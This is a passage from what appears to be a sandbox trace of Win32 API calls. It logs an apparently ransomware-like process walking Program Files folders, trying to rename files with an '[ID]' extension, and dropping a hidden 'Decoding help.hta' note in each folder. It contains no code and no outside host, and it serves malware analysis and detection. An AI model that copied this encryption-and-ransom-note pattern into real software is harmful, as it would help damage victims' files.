(x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.968] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.968] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="wab.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wab.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wab.exe" [0039.968] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wab.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wab.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wab.exe" [0039.968] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wab.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wab.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wab.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.968] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wab.exe" (normalized: "c:\\program files (x86)\\windows mail\\wab.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wab.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows mail\\wab.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.973] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xa50fd30 | out: lpFindFileData=0xa50fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a77900b, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8a77900b, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb04ef6b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x8200, dwReserved0=0x0, dwReserved1=0x0, cFileName="wabfind.dll", cAlternateFileName="")) returned 1 [0039.973] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.973] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.973] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" [0039.973] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows mail\\decoding help.hta")) returned 0x1 [0039.973] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wabfind.dll") returned -1 [0039.973] lstrlenW (lpString="wabfind.dll") returned 11 [0039.974] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.974] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.974] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="wabfind.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabfind.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabfind.dll" [0039.974] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabfind.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabfind.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabfind.dll" [0039.974] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabfind.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabfind.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabfind.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.974] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabfind.dll" (normalized: "c:\\program files (x86)\\windows mail\\wabfind.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabfind.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows mail\\wabfind.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.974] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xa50fd30 | out: lpFindFileData=0xa50fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a1aba92, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8a1aba92, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb05167b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="wabimp.dll", cAlternateFileName="")) returned 1 [0039.974] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.974] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.974] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" [0039.974] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows mail\\decoding help.hta")) returned 0x1 [0039.974] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wabimp.dll") returned -1 [0039.974] lstrlenW (lpString="wabimp.dll") returned 10 [0039.974] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.974] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.974] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="wabimp.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabimp.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabimp.dll" [0039.974] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabimp.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabimp.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabimp.dll" [0039.974] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabimp.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabimp.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabimp.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.974] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabimp.dll" (normalized: "c:\\program files (x86)\\windows mail\\wabimp.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabimp.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows mail\\wabimp.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.974] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xa50fd30 | out: lpFindFileData=0xa50fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c2b2af4, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8c2b2af4, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x78aae250, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="wabmig.exe", cAlternateFileName="")) returned 1 [0039.974] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.974] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.975] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" [0039.975] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows mail\\decoding help.hta")) returned 0x1 [0039.975] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wabmig.exe") returned -1 [0039.975] lstrlenW (lpString="wabmig.exe") returned 10 [0039.975] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.975] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.975] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="wabmig.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabmig.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabmig.exe" [0039.975] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabmig.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabmig.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabmig.exe" [0039.975] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabmig.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabmig.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabmig.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.975] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabmig.exe" (normalized: "c:\\program files (x86)\\windows mail\\wabmig.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabmig.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows mail\\wabmig.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.975] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xa50fd30 | out: lpFindFileData=0xa50fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8e771d9d, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8e771d9d, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x796bc150, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x60e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinMail.exe", cAlternateFileName="")) returned 1 [0039.975] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.975] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.975] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" [0039.975] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows mail\\decoding help.hta")) returned 0x1 [0039.975] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WinMail.exe") returned -1 [0039.975] lstrlenW (lpString="WinMail.exe") returned 11 [0039.975] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0039.975] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned 43 [0039.975] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\", lpString2="WinMail.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\WinMail.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\WinMail.exe" [0039.975] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\WinMail.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\WinMail.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\WinMail.exe" [0039.975] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\WinMail.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\WinMail.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\WinMail.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.975] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\WinMail.exe" (normalized: "c:\\program files (x86)\\windows mail\\winmail.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\WinMail.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows mail\\winmail.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.985] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xa50fd30 | out: lpFindFileData=0xa50fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8e771d9d, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8e771d9d, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x796bc150, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x60e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinMail.exe", cAlternateFileName="")) returned 0 [0039.986] FindClose (in: hFindFile=0x5a57b0 | out: hFindFile=0x5a57b0) returned 1 Thread: id = 104 os_tid = 0xbd4 [0039.828] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*", lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a57f0 [0039.828] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.828] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.964] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.964] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.965] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21ca67c6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0039.965] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0039.965] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0039.965] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0039.965] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0039.965] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0039.965] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US" [0039.965] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\*.*" [0039.965] GlobalMemoryStatus (in: lpBuffer=0xa64fd10 | out: lpBuffer=0xa64fd10) [0039.965] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x3380118, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x224 [0039.972] CloseHandle (hObject=0x224) returned 1 [0039.972] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Icons", cAlternateFileName="")) returned 1 [0039.972] lstrcmpW (lpString1=".", lpString2="Icons") returned -1 [0039.972] lstrcmpW (lpString1="..", lpString2="Icons") returned -1 [0039.972] lstrcmpiW (lpString1="windows", lpString2="Icons") returned 1 [0039.972] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0039.972] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0039.972] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Icons" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Icons") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Icons" [0039.972] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Icons", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Icons\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Icons\\*.*" [0039.972] GlobalMemoryStatus (in: lpBuffer=0xa64fd10 | out: lpBuffer=0xa64fd10) [0039.972] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93e83f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x224 [0039.984] CloseHandle (hObject=0x224) returned 1 [0039.984] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81351db4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81351db4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media Renderer", cAlternateFileName="MEDIAR~1")) returned 1 [0039.984] lstrcmpW (lpString1=".", lpString2="Media Renderer") returned -1 [0039.984] lstrcmpW (lpString1="..", lpString2="Media Renderer") returned -1 [0039.984] lstrcmpiW (lpString1="windows", lpString2="Media Renderer") returned 1 [0039.985] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0039.985] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0039.985] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Media Renderer" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer" [0039.985] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" [0039.985] GlobalMemoryStatus (in: lpBuffer=0xa64fd10 | out: lpBuffer=0xa64fd10) [0039.985] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9400458, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x224 [0039.994] CloseHandle (hObject=0x224) returned 1 [0039.994] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5da15071, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x5da15071, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9b03e9f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x25a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mpvis.DLL", cAlternateFileName="")) returned 1 [0039.994] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0039.994] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0039.994] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" [0039.994] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\decoding help.hta")) returned 0xffffffff [0039.994] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0039.994] WriteFile (in: hFile=0x224, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa64fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa64fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.995] CloseHandle (hObject=0x224) returned 1 [0039.995] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.996] lstrcmpiW (lpString1="Decoding help.hta", lpString2="mpvis.DLL") returned -1 [0039.996] lstrlenW (lpString="mpvis.DLL") returned 9 [0039.996] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0039.996] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0039.996] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="mpvis.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\mpvis.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\mpvis.DLL" [0039.996] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\mpvis.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\mpvis.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\mpvis.DLL" [0039.996] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\mpvis.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\mpvis.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\mpvis.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0039.996] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\mpvis.DLL" (normalized: "c:\\program files (x86)\\windows media player\\mpvis.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\mpvis.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\mpvis.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.996] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Sharing", cAlternateFileName="NETWOR~1")) returned 1 [0039.996] 